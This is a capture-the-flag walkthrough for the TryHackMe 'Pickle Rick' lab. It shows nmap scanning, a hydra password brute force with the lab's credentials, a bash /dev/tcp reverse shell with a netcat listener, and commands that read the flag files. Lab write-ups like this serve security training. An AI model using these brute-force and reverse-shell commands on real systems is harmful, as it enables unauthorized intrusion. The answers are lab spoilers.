----------------                               ------------------
               :::::::::::;| PICKLE RICK |;::::::::::::


1) FIRST WE HAVE TO ACCES THE TRYHACKME FROM OPENVPN.
2) WE HAVE TO JOIN THE ROOM "PICKLE RICK".
 
TASK - 1 (RECON)

1. SCAN THE MACHNE.

    namp -Pn <ip>

    nmap -A -T 5 <ip> -vv

"it's a Linux machine".

2. How many ports are open?
ANS: 2 ports (22/SSH, 80/HTTP)

3. What's the webpage title?
ANS: "Pickle Rick"

----------TASK 1 COMPLETED----------

TASK - 2 (GAIN ACCESS)

1. FIND LOGIN.

    http://<ip>/login.php

"Found username in source: R1ckRul3s"

2. BRUTE FORCE.

    hydra -l R1ckRul3s -P rockyou.txt http-post-form://<ip>/login.php:username=^USER^&password=^PASS^:Invalid

"Password: winter (LOL)"

----------TASK 2 COMPLETED-----------
 
TASK - 3 (COMMAND PANEL)

1. EXECUTE COMMANDS.

    "Use command panel after login"
    ls
    "Found ingredient files!"

2. GET REVERSE SHELL.

    nc -lvnp 4444
    bash -i >& /dev/tcp/<your_ip>/4444 0>&1

"GOT SHELL!"

----------TASK 3 COMPLETED-----------

TASK-4 (FIND FLAGS)

1. FIRST INGREDIENT.

    cat Sup3rS3cretPickl3Ingred.txt

2. SECOND INGREDIENT.

    cat /home/rick/second-ingredient.txt

3. THIRD INGREDIENT.

    cat /root/3rd.txt

-------------------                                                --------------------
             -----------                                    ------------
                  ---------- PICKLE RICK PWNED ----------
